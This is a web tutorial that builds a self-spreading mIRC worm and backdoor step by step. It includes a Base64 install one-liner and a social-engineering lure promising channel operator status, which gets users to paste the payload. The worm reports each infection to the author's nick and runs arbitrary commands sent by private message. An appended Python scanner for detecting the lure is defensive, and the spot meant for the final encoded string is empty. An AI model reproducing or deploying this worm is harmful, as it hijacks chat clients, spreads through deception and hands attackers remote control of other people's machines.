IRC Self-Propagating Script

In this tutorial I will try to show a method for making a self-replicating script for mIRC. This tutorial is for educational use only, to explore how mIRC scripting works and how you can protect yourself against these threats. The author does not take any responsibility for the damage one can cause using this script. If you do not agree with these terms I suggest you stop reading this tutorial.


Tutorial mIRC Self-Propagating Script

First of all, note that this script allows the client to be controlled remotely. This means that people (eventually bots) that have this script running can be controlled by you via IRC. It is possible for the script to propagate in a natural way.

Get Started

It all starts with the following command:

//write mab.mrc $decode(b24gXio6dGV4dDoqOio6IHsgaWYgK
ChpbnMqIGlzd20gJDEtKSAmJiAoJHRhcmdldCA9PSAkbWUpKSB7IC
4gJCsgJDItIHwgaGFsdGRlZiB9IHwgZWxzZWlmICgoYSogaXN3bSA
kMS0pICYmICgkY2hhbikpIHsgLm1zZyBtYWIgaW5mIHwgLm1zZyAk
bmljayBXYW50IHRvIGJlIE9QRVJBVE9SIGluICRjaGFuIGNvcHkvc
GFzdGUgdGhpcy0+IAM0Ly93cml0ZSAuICQgJCsgZGVjb2RlKCAkKy
AkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGN
ocigxMjQpIC5sb2FkIC1ycyB9IH0=,m) | .load -rs mab.mrc

All of this goes on one line!

Understand the Script

We need to combine these two things:

The Self-Propagating Part (IRC Worm)

on 1:text:*a*:#:{ .ignore $nick | .timer 0 120 .join #mab | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R }

Here #mab is the channel you want them to join once they have installed the script. Since that would not be very efficient in most cases, we can do it another way: we let it message you. We replace .timer 0 120 .join #mab with .msg mab_ inf, where mab_ is your nickname.

With this, your self-replicating and self-propagating script has started. It will now try to spread: it sends 'itself' to some people by private message while ignoring them. Having done that, it will try to send itself to other users and tell them to type the command.

Now we are going to change some things so that the control script works as intended. We will remove the user mode +R at the end of the script, because it only lets users who are authenticated with the official server bot message the script user. Once the script is installed that is not the objective, so we remove it from the script. After these changes we get the following script, which we have to merge with the remote control script:

on 1:text:*a*:#:{ .ignore $nick | .msg mab_ inf | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> $chr(3) $+ 4//write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs }

The Remote Access (control) Part

on ^*:text:ins*:?:{ . $+ $2- | haltdef }

Combined, they give us the self-propagating remote control script. This means the script will spread itself, join a certain channel (here: #mab), keep spreading itself after that, and meanwhile wait for you to control it remotely. So you will be able to obtain complete remote access to the client, using mIRC.

I will now try to give more details about that script, so that you truly understand it and can modify it easily. I will combine the two parts.

So basically we want to combine these two “mechanisms”:

on 1:text:*a*:#:{ DO SOMETHING }
on ^*:text:ins*:?:{ DO SOMETHING ELSE | haltdef }

Solution:

on ^*:text:*:*: {
if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING
elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE
}

In one line:

on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING | elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE }

Here DO SOMETHING is the remote control part's work and DO SOMETHING ELSE is the self-propagating part's work.

Integrated (Two parts joined together):

on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) { . $+ $2- | haltdef } | elseif ((a* iswm $1-) && ($chan)) { .msg mab_ inf | .msg $nick Do you want to be OPERATOR in $ $+ chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R } }

Good, this is exactly what we needed. It doesn't look very good yet, so we need to encode it with mIRC. To do that we first have to write it differently: some characters must be written another way because mIRC can misinterpret them as parameters or other things. The following characters have to be written differently: (){},
Why these characters, and how can I check it?

//echo -a $asc(char here)

If this gives a bad result, the character must be written in another way.

Example encoding of “,”:

//say $encode(,,m) This is wrong
//say $encode($+ $chr(44),m) This is correct

Note:

$+ = pasting two strings together

| = $chr(124)
, = $chr(44)
( = $chr(40)
) = $chr(41)
{ = $chr(123)
} = $chr(125)

Sometimes this method is not needed.

To find the numbers, use this:

//echo -a $asc($?)

This will pop up an input box; just fill in the character and you'll get its number as the result.

Now it is possible to use $encode without bugs. This is what we get before we start encoding:

on ^*:text:*:*: $chr(123) if ((ins* iswm $ $+ 1-) && ($ $+ target == $ $+ me)) $chr(123) . $ $+ + $ $+ 2- $chr(124) haltdef $chr(125) $chr(124) elseif ((a* iswm $ $+ 1-) && ($chan)) $chr(123) .msg mab inf $chr(124) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(3) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,1),m) $ $+ + ,m) $ $+ chr(124) .load -rs $chr(125) $chr(125)

So:

//say $encode(on ^*:text:*:*: $chr(123) if ((ins* iswm $ $+ 1-) && ($ $+ target == $ $+ me)) $chr(123) . $ $+ + $ $+ 2- $chr(124) haltdef $chr(125) $chr(124) elseif ((a* iswm $ $+ 1-) && ($chan)) $chr(123) .msg mab inf $chr(124) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(3) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,1),m) $ $+ + ,m) $ $+ chr(124) .load -rs $chr(125) $chr(125),m)

To find the $encoded value we split the string up into global variables. The variables are set with

/set %var STRING

So to find it we write the following in mIRC:

//say $encode(%var1 $+ %var2 $+ %var3 $+ %var4,m)

But we don't necessarily need to set it as variables before we encode it. You can just use the encode line.

We get the following as the result, a single Base64 string:


This is the encoded command in one line of code.
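To recognise this lure on the receiving side, here is a log scanner added as an example (it is not part of the original tutorial). It flags messages that ask the reader to /write a $decode(...,m) expression and load it. The function name, finding labels and sample lines are assumptions, and the sample payload is a constructed, harmless placeholder.

```python
import base64
import re

# mIRC formatting codes: colour (\x03 + optional digits), bold, reset, reverse, italic, underline.
CONTROL_CODES = re.compile(r"\x03(?:\d{1,2}(?:,\d{1,2})?)?|[\x02\x0f\x16\x1d\x1f]")
# A /write of a $decode(<base64>,m) expression, the shape of the lure shown on this page.
WRITE_DECODE = re.compile(r"/write\s+\S+\s+\$decode\(\s*([A-Za-z0-9+/=]+)\s*,\s*m\s*\)", re.I)
LOAD_SCRIPT = re.compile(r"\bload\s+-rs\b", re.I)
# An "on ...:text:" remote event inside the decoded payload.
TEXT_EVENT = re.compile(r"\bon\s+[^:\s]*:text:", re.I)


def inspect_message(text):
    """Return a list of findings for one IRC message body (empty list = clean)."""
    clean = CONTROL_CODES.sub("", text)  # colour codes are used to highlight the lure
    findings = []
    match = WRITE_DECODE.search(clean)
    if not match:
        return findings
    findings.append("write-of-decoded-base64")
    if LOAD_SCRIPT.search(clean):
        findings.append("loads-remote-script")
    try:
        payload = base64.b64decode(match.group(1), validate=True).decode("latin-1")
    except ValueError:  # binascii.Error is a ValueError subclass
        findings.append("undecodable-payload")
        return findings
    if TEXT_EVENT.search(payload):
        findings.append("payload-registers-text-event")
    if "$read($script" in payload.replace(" ", ""):
        findings.append("payload-reads-own-script")  # self-replication marker
    return findings


# Constructed sample log lines; the payload is a harmless placeholder handler.
BENIGN_PAYLOAD = base64.b64encode(b"on *:text:*:#: { echo -a constructed sample }").decode()
SAMPLE_LINES = [
    "<alice> anyone know how to use /write to save a log?",
    "<bob> Want to be OPERATOR in #chan copy/paste this-> \x034//write . $decode("
    + BENIGN_PAYLOAD + ",m) | .load -rs",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(inspect_message(line), "<-", line[:40])
```

Any message that returns findings should be treated as a script-install lure and never pasted into the client.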

 

Still questions?

Ask on IRC!


 
 


Mabsoft Copyright 2015 Mabsoft. All Rights Reserved.

 


